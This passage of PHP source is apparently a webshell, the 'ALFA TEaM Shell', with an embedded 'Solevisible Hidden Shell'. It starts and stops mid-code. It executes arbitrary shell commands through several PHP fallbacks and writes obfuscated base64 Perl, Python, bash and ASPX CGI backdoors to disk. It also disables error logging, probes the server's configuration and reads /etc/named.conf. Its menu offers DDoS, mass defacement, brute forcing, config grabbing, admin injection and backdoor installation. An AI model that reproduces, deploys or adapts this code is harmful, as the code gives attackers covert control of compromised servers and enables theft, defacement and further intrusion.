';\n}}\nfunction _alfa_cgicmd($cmd,$lang=\"perl\",$set_cookie=false){\n\tif(!$GLOBALS[\"DB_NAME\"][\"cgi_api\"]){\n\t\treturn \"\";\n\t}\n\tif(isset($_COOKIE[\"alfacgiapi_mode\"])){\n\t\treturn \"\";\n\t}\n\t$cmd_pure = $cmd;\n\t$is_curl = function_exists('curl_version');\n\t$is_socket = function_exists('fsockopen');\n\tif($is_curl||$is_socket){\n\t\t$recreate = false;\n\t\tif(isset($_COOKIE[\"alfacgiapi\"])){\n\t\t\tif(!@file_exists(\"alfacgiapi/\".$_COOKIE[\"alfacgiapi\"].\".alfa\")){\n\t\t\t\t$recreate = true;\n\t\t\t\t$lang = $_COOKIE[\"alfacgiapi\"];\n\t\t\t}\n\t\t}\n\t\tif(!isset($_COOKIE[\"alfacgiapi\"])||$recreate){\n\t\t\t@chdir(dirname($_SERVER[\"SCRIPT_FILENAME\"]));\n\t\t\t$perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';\n\t\t\t$py = \"bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=\";\n\t\t\t$bash = \"rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C\";\n\t\t\t$aspx = \"jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw==\";\n\t\t\tif($lang==\"perl\")$source = $perl;elseif($lang==\"py\")$source = $py;else $source = $bash;\n\t\t\tif($lang == \"aspx\"){\n\t\t\t\talfaWriteTocgiapi(\"aspx.aspx\",$aspx);\n\t\t\t}else{\n\t\t\t\talfaWriteTocgiapi($lang.\".alfa\",$source);\n\t\t\t}\n\t\t\talfacgihtaccess('cgi', \"alfacgiapi/\");\n\t\t}else{\n\t\t\t$lang = $_COOKIE[\"alfacgiapi\"];\n\t\t}\n\t\t$cgi_ext = \".alfa\";\n\t\tif($lang==\"aspx\"){\n\t\t\t$cgi_ext = \".aspx\";\n\t\t}\n\t\t$cgi_url = __ALFA_DATA_FOLDER__.\"/alfacgiapi/\".$lang.$cgi_ext;\n\t\t$cmd = \"check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=\".__ZW5jb2Rlcg(\"cd \".$GLOBALS['cwd'].\";\".$cmd);\n\t\tif($is_curl){\n\t\t\t$address = ($_SERVER['SERVER_PORT'] == 443 ? \"https://\" : \"http://\").$_SERVER[\"SERVER_NAME\"].dirname($_SERVER[\"REQUEST_URI\"]).\"/\".$cgi_url;\n\t\t\t$post = new AlfaCURL();\n\t\t\t$data = $post->Send($address, \"post\", $cmd);\n\t\t}elseif($is_socket){\n\t\t\t$server = $_SERVER[\"SERVER_NAME\"];\n\t\t\t$uri = dirname($_SERVER[\"REQUEST_URI\"]).\"/\".$cgi_url;\n\t\t\t$data = _alfa_fsockopen($server,$uri,$cmd);\n\t\t}\n\t\t$out = \"\";\n\t\tif(strpos($data, \"[solevisible~api]\") !== false && strpos($data, '[solevisible~api]
\"+output+\"
') === false){\n\t\t\tif($set_cookie){\n\t\t\t\t__alfa_set_cookie(\"alfacgiapi\", $lang);\n\t\t\t}\n\t\t\tif(@preg_match(\"/
(.*?)<\\/pre>/s\", $data, $res)){\n\t\t\t\t$out = $res[1];\n\t\t\t}\n\t\t}elseif($lang==\"perl\"){\n\t\t\treturn _alfa_cgicmd($cmd_pure,\"py\",$set_cookie);\n\t\t}elseif($lang==\"py\"){\n\t\t\treturn _alfa_cgicmd($cmd_pure,\"bash\",$set_cookie);\n\t\t}elseif($lang==\"bash\" && $GLOBALS['sys']==\"win\"){\n\t\t\treturn _alfa_cgicmd($cmd_pure,\"aspx\",$set_cookie);\n\t\t}else{\n\t\t\tif($set_cookie){\n\t\t\t\t__alfa_set_cookie(\"alfacgiapi_mode\", \"off\");\n\t\t\t}\n\t\t}\n\t\treturn trim($out);\n\t}else{\n\t\treturn \"\";\n\t}\n}\nfunction alfaGetCwd(){\n\tif(function_exists(\"getcwd\")){\n\t\treturn @getcwd();\n\t}else{\n\t\treturn dirname($_SERVER[\"SCRIPT_FILENAME\"]);\n\t}\n}\nfunction alfaEx($in,$re=false,$cgi=true,$all=false){\n\t$data = _alfa_php_cmd($in,$re);\n\tif(empty($data)&&$cgi||$all){\n\t\tif($GLOBALS['sys']=='unix'){\n\t\t\tif(strlen(_alfa_php_cmd(\"whoami\"))==0||$all){\n\t\t\t\t$cmd = _alfa_cgicmd($in);\n\t\t\t\tif(!empty($cmd)){\n\t\t\t\t\treturn $cmd;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn $data;\n}\nfunction _alfa_php_cmd($in,$re=false){\n$out='';\ntry{\nif($re)$in=$in.\" 2>&1\";\nif(function_exists('exec')){\n@exec($in,$out);\n$out = @join(\"\\n\",$out);\n}elseif(function_exists('passthru')) {\nob_start();\n@passthru($in);\n$out = ob_get_clean();\n}elseif(function_exists('system')){\nob_start();\n@system($in);\n$out = ob_get_clean();\n} elseif (function_exists('shell_exec')) {\n$out = shell_exec($in);\n}elseif(function_exists(\"popen\")&&function_exists(\"pclose\")){\nif(is_resource($f = @popen($in,\"r\"))){\n$out = \"\";\nwhile(!@feof($f))\n$out .= fread($f,1024);\npclose($f);\n}\n}elseif(function_exists('proc_open')){\n$pipes = array();\n$process = @proc_open($in.' 2>&1', array(array(\"pipe\",\"w\"), array(\"pipe\",\"w\"), array(\"pipe\",\"w\")), $pipes, null);\n$out=@stream_get_contents($pipes[1]);\n}elseif(class_exists('COM')){\n$alfaWs = new COM('WScript.shell');\n$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);\n$stdout = $exec->StdOut();\n$out=$stdout->ReadAll();\n}\n}catch(Exception $e){}\nreturn $out;\n}\nfunction _alfa_fsockopen($server,$uri,$post){\n\t$socket = @fsockopen($server, 80, $errno, $errstr, 15);\n\tif($socket){\n\t\t$http  = \"POST {$uri} HTTP/1.0\\r\\n\";\n\t\t$http .= \"Host: {$server}\\r\\n\";\n\t\t$http .= \"User-Agent: \" . $_SERVER['HTTP_USER_AGENT'] . \"\\r\\n\";\n\t\t$http .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\t\t$http .= \"Content-length: \" . strlen($post) . \"\\r\\n\";\n\t\t$http .= \"Connection: close\\r\\n\\r\\n\";\n\t\t$http .= $post . \"\\r\\n\\r\\n\";\n\t\tfwrite($socket, $http);\n\t\t$contents = \"\";\n\t\twhile (!@feof($socket)) {\n\t\t\t$contents .= @fgets($socket, 4096);\n\t\t}\n\t\tlist($header, $body) = explode(\"\\r\\n\\r\\n\", $contents, 2);\n\t\t@fclose($socket);\n\t\treturn $body;\n\t}else{\n\t\treturn \"\";\n\t}\n}\nif(isset($_GET[\"solevisible\"])){\n@error_reporting(E_ALL ^ E_NOTICE);\necho '';\necho \"Solevisible Hidden Shell\";\necho \"\";\necho 'Kernel : '.(function_exists('php_uname')?php_uname():'???').'';\n$safe_mode = @ini_get('safe_mode');\nif($safe_mode){$r = \"On\";}else{$r = \"Off\";}\necho \"
OS: \" . PHP_OS . \"
\";\necho \"Software: \" . $_SERVER ['SERVER_SOFTWARE'] . \"
\";\necho \"PHP Version: \" . PHP_VERSION .  \"
\";\necho \"PWD: \" . str_replace(\"\\\\\",\"/\",@alfaGetCwd()) . \"/
\";\necho \"Safe Mode : $r
\";\necho\"Disable functions : \";\n$disfun = @ini_get('disable_functions');\nif(empty($disfun)){$disfun = 'NONE';}\necho\"\";\necho \"$disfun\";\necho\"
\";\necho \"Your Ip Address is :  \" . $_SERVER['REMOTE_ADDR'] . \"
\";\necho \"Server Ip Address is :  \".(function_exists('gethostbyname')?@gethostbyname($_SERVER[\"HTTP_HOST\"]):'???').\"
\";\necho '
';\necho 'CWD: 
';\nif(isset($_FILES['file'])){\nif(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '
Upload Successfully ;)

'; }\nelse{echo '
Upload failed :(


'; }\n}\necho '
Execute Command: 
\n
';\nif(isset($_POST['command_solevisible'])){\nif(strtolower(substr(PHP_OS,0,3))==\"win\")$separator='&';else $separator=';';\n$solevisible = \"cd '\".addslashes(str_replace(\"\\\\\",\"/\",@alfaGetCwd())).\"'\".$separator.\"\".__ZGVjb2Rlcg($_POST['command_solevisible']);\necho alfaEx($solevisible);\n}\necho'
\n';\nexit;}\n@error_reporting(E_ALL ^ E_NOTICE);\n@ini_set('error_log',NULL);\n@ini_set('log_errors',0);\n@ini_set('max_execution_time',0);\n@ini_set('magic_quotes_runtime', 0);\n@set_time_limit(0);\nif(function_exists('set_magic_quotes_runtime')){\n@set_magic_quotes_runtime(0);\n}\nforeach($_POST as $key => $value){\nif(is_array($_POST[$key])){\n$i=0;\nforeach($_POST[$key] as $f) {\n$f = trim(str_replace(' ', '+',$f));\n$_POST[$key][$i] = decrypt_post($f);\n$i++;\n}\n}else{\n$value = trim(str_replace(' ', '+',$value));\n$_POST[$key] = decrypt_post($value);\n}\n}\n$default_action = 'FilesMan2';//'FilesMan';\n$default_use_ajax = true;\n$default_charset = 'Windows-1251';\nif(strtolower(substr(PHP_OS,0,3))==\"win\")\n$GLOBALS['sys']='win';\nelse\n$GLOBALS['sys']='unix';\n$GLOBALS['home_cwd'] = @alfaGetCwd();\n$GLOBALS[\"need_to_update_header\"] = \"false\";\n$GLOBALS['glob_chdir_false'] = false;\nif(isset($_POST['c'])){\nif(!@chdir($_POST['c'])){\n\t$GLOBALS['glob_chdir_false'] = true;\n}\n}\n$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());\nif($GLOBALS['glob_chdir_false']){\n\t$GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());\n}\nif($GLOBALS['sys'] == 'win'){\n$GLOBALS['home_cwd'] = str_replace(\"\\\\\", \"/\", $GLOBALS['home_cwd']);\n$GLOBALS['cwd'] = str_replace(\"\\\\\", \"/\", $GLOBALS['cwd']);\n}\nif($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';\nif(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}\nif(!function_exists(\"mb_strlen\")){\n\tfunction mb_strlen($str, $c=\"\"){\n\t\treturn strlen($str);\n\t}\n}\nif(!function_exists(\"mb_substr\")){\n\tfunction mb_substr($str, $start, $end, $c=\"\"){\n\t\treturn substr($str, $start, $end);\n\t}\n}\ndefine(\"ALFA_TEMPDIR\", (function_exists(\"sys_get_temp_dir\") ? (@is_writable(str_replace('\\\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));\nfunction alfahead(){\n$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';\n$alfa_uploader = '$x = base64_decode(\"'.$GLOBALS['__ALFA_SHELL_CODE'].'\");$solevisible = fopen(\"solevisible.php\",\"w\");fwrite($solevisible,$x);';\ndefine(\"ALFA_UPLOADER\", \"eval(base64_decode('\".__ZW5jb2Rlcg($alfa_uploader).\"'))\");\nif(!isset($_POST['ajax'])){\nfunction Alfa_GetDisable_Function(){\n$disfun = @ini_get('disable_functions');\n$afa = 'All Functions Accessible';\nif(empty($disfun))return($afa);\n$s = explode(',',$disfun);\n$s = array_unique($s);\n$i=0;\n$b=0;\n$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');\n$black_list = array();\n$allow_list = array();\nforeach($s as $d){\n\t$d=trim($d);\n\tif(empty($d)||!is_callable($d))continue;\n\tif(!function_exists($d)){\n\t\tif(in_array($d,$func)){\n\t\t\t$dis .= $d.\" | \";$b++;\n\t\t\t$black_list[] = $d;\n\t\t}else{\n\t\t\t$allow_list[] = $d;\n\t\t}\n\t\t$i++;\n\t}\n}\nif($i==0)return($afa);\nif($i <= count($func)){\n$all = array_values(array_merge($black_list, $allow_list));\nreturn(''.implode(\" | \", $all).'');\n}\nreturn(''.$dis.'Show All ('.$i.')');\n}\nfunction AlfaNum(){\n$args = func_get_args();\n$alfax = array();\n$find = array();\nfor($i=1;$i<=10;$i++){\n$alfax[] = $i;\n}\nforeach($args as $arg){\n$find[] = $arg;\n}\necho '';\n}\nif(empty($_POST['charset']))\n$_POST['charset'] = $GLOBALS['default_charset'];\n$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';\n$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';\n$totalSpace = $totalSpace?$totalSpace:1;\n$on=\" ON \";\n$of=\" OFF \";\n$none=\" NONE \";\nif(function_exists('ssh2_connect'))\n$ssh2=$on;\nelse\n$ssh2=$of;\nif(function_exists('curl_version'))\n$curl=$on;\nelse\n$curl=$of;\nif(function_exists('mysql_get_client_info')||class_exists('mysqli'))\n$mysql=$on;\nelse\n$mysql=$of;\nif(function_exists('mssql_connect'))\n$mssql=$on;\nelse\n$mssql=$of;\nif(function_exists('pg_connect'))\n$pg=$on;\nelse\n$pg=$of;\nif(function_exists('oci_connect'))\n$or=$on;\nelse\n$or=$of;\nif(@ini_get('disable_functions'))\n$disfun=@ini_get('disable_functions');\nelse\n$disfun=\"All Functions Enable\";\nif(@ini_get('safe_mode'))\n$safe_modes=\"ON\";\nelse\n$safe_modes=\"OFF\";\n$cgi_shell=\"OFF\";\nif(@ini_get('open_basedir')){\n$basedir_data = @ini_get('open_basedir');\nif(strlen($basedir_data)>120){\n$open_b=substr($basedir_data,0, 120).\"...\";\n}else{\n$open_b = $basedir_data;\n}\n}else{$open_b=$none;}\nif(@ini_get('safe_mode_exec_dir'))\n$safe_exe=@ini_get('safe_mode_exec_dir');\nelse\n$safe_exe=$none;\nif(@ini_get('safe_mode_include_dir'))\n$safe_include=@ini_get('safe_mode_include_dir');\nelse\n$safe_include=$none;\nif(!function_exists('posix_getegid'))\n{\n$user = function_exists(\"get_current_user\")?@get_current_user():\"????\";\n$uid = function_exists(\"getmyuid\")?@getmyuid():\"????\";\n$gid = function_exists(\"getmygid\")?@getmygid():\"????\";\n$group = \"?\";\n}else{\n$uid = function_exists(\"posix_getpwuid\")&&function_exists(\"posix_geteuid\")?@posix_getpwuid(posix_geteuid()):array(\"name\"=>\"????\", \"uid\"=>\"????\");\n$gid = function_exists(\"posix_getgrgid\")&&function_exists(\"posix_getegid\")?@posix_getgrgid(posix_getegid()):array(\"name\"=>\"????\", \"gid\"=>\"????\");\n$user = $uid['name'];\n$uid = $uid['uid'];\n$group = $gid['name'];\n$gid = $gid['gid'];\n}\n$cwd_links = '';\n$path = explode(\"/\", $GLOBALS['cwd']);\n$n=count($path);\nfor($i=0; $i<$n-1; $i++) {\n$cwd_links .= \"\".$path[$i].\"/\";\n}\n$drives = \"\";\nforeach(range('a','z') as $drive)\nif(@is_dir($drive.':\\\\'))\n$drives .= '[ '.$drive.' ] ';\n$csscode ='\t-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';\necho '\n\n\n\n\n\n..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..\n';\necho \"\n\n\n\n\n\n\n
\";\n$cmd_uname = alfaEx(\"uname -a\",false,false);\n$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');\nif($uname==\"( php_uname ) Function Disabled !\"){$GLOBALS[\"need_to_update_header\"]=\"true\";}\necho '\n\n\n
\n
\n
\n\n';\nfor($s=1;$s<=10;$s++){\necho '';\n}\necho '\n
\n\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n';\nif($GLOBALS['sys']=='unix'){\n$useful_downloader = '';\nif(!@ini_get('safe_mode')){\nif(strlen(alfaEx(\"id\",false,false))>0){\necho '\n\n\n\n';\n}else{\necho $useful_downloader;$GLOBALS[\"need_to_update_header\"] = \"true\";\n}\n}else{\necho $useful_downloader;$GLOBALS[\"need_to_update_header\"] = \"true\";\n}\n}else{\necho '\n\n\n';\n}\n$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == \"1\" or $quotes == \"on\"){$magic = 'ON';}else{$magic = 'OFF';}\necho '\n\n\n\n\n\n\n\n\n\n\n\n';\nif($GLOBALS['sys']==\"win\"){\necho '\n\n\n';\n}\necho '\n\n\n\n
Uname:'.$uname.'
User:'. $uid . ' [ ' . $user . ' ]  Group: ' . $gid . ' [ ' . $group . ' ] \"alfa
PHP:'.@phpversion(). '  Safe Mode: '.$safe_modes.'
ServerIP:'.(!@$_SERVER[\"SERVER_ADDR\"]?(function_exists(\"gethostbyname\")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER[\"SERVER_ADDR\"]).' Your IP: '.@$_SERVER[\"REMOTE_ADDR\"].'
DateTime:'.date('Y-m-d H:i:s').'
Domains:';\nif($GLOBALS['sys']=='unix'){\n$d0mains = _alfa_file(\"/etc/named.conf\",false);\nif(!$d0mains){echo \"Cant Read [ /etc/named.conf ]\";$GLOBALS[\"need_to_update_header\"]=\"true\";}else{\n$count=0;\nforeach($d0mains as $d0main){\nif(@strstr($d0main,\"zone\")){\npreg_match_all('#zone \"(.*)\"#', $d0main, $domains);\nflush();\nif(strlen(trim($domains[1][0])) > 2){\nflush();\n$count++;}}}\necho \"$count Domains\";}}\nelse{echo(\"Cant Read [ /etc/named.conf ]\");}\necho '
HDD:Total:'.alfaSize($totalSpace).' Free:' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
useful:--------------
Downloader: --------------
Useful : ';\n$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');\n$x=0;\nforeach($userful as $item)if(alfaWhich($item)){$x++;echo ''.$item.'';}\nif($x==0){echo \"--------------\";$GLOBALS[\"need_to_update_header\"] = \"true\";}\necho '
Downloader: ';\n$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\n$x=0;\nforeach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo ''.$item2.'';}\nif($x==0){echo \"--------------\";$GLOBALS[\"need_to_update_header\"] = \"true\";}\necho '
Windows:';\necho alfaEx('ver',false,false);\necho '
 
Downloader: -------------
Disable Functions: '.Alfa_GetDisable_Function().'
CURL :'.$curl.' | SSH2 : '.$ssh2.' | Magic Quotes : '.$magic.' |  MySQL :'.$mysql.' | MSSQL :'.$mssql.' |  PostgreSQL :'.$pg.' |  Oracle :'.$or.' '.($GLOBALS['sys']==\"unix\"?'|  CGI : '.$cgi_shell:\"\").'
Open_basedir :'.$open_b.' | Safe_mode_exec_dir :'.$safe_exe.' |  Safe_mode_include_dir :'.$safe_include.'
SoftWare: '.@getenv('SERVER_SOFTWARE').'
DRIVE:'.$drives.'
PWD:'.$cwd_links.' [ Home Shell ] 
\n
\n
\n
    \n';\n$li = array('proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',\n'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',\n'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',\n'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',\n'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'\n);\nforeach($li as $key=>$value){\necho('
  • '.$value.'
    • '.\"\\n\");\n}\necho '
Alfa SettingsAlfa marketAbout Us'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? 'LogOut':'').'
 File manager
New Tab +
';}else{\n@error_reporting(E_ALL ^ E_NOTICE);\n@ini_set('error_log',NULL);\n@ini_set('log_errors',0);\n@ini_set('max_execution_time',0);\n@ini_set('magic_quotes_runtime', 0);\n@set_time_limit(0);\n}}\nfunction alfalogout(){\n@setcookie(\"AlfaUser\", null, 2012);\n@setcookie(\"AlfaPass\", null, 2012);\nunset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);\necho(\"ok\");\n}\nfunction showAnimation($name){\n\treturn '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';\n}\nfunction __showicon($r){\n\t$s['btn']='http://solevisible.com/images/btn.png';\n\t$s['alfamini']='http://solevisible.com/images/alfamini.png';\n\t$s['loader']='http://solevisible.com/images/loader.svg';\n\t//return 'data:image/png;base64,'.__get_resource($s[$r]);\n\treturn $s[$r];\n}\nfunction alfainbackdoor(){\nalfahead();\necho '
| Install BackDoor |
| In File | | In DataBase | 
';\n$error = 'Error In Inject BackDoor...!
File Loader is not Writable Or Not Exists...!';\n$success= 'Success...!';\n$textarea = \"\";\n$select = \"
Use:
 \";\n$cwd = 'Example: /home/alfa/public_html/index.php';\nif($_POST['alfa1']=='file'){\necho(\"
| In File |
{$select} 
Backdoor Loader:
  
Key: 
  {$textarea}
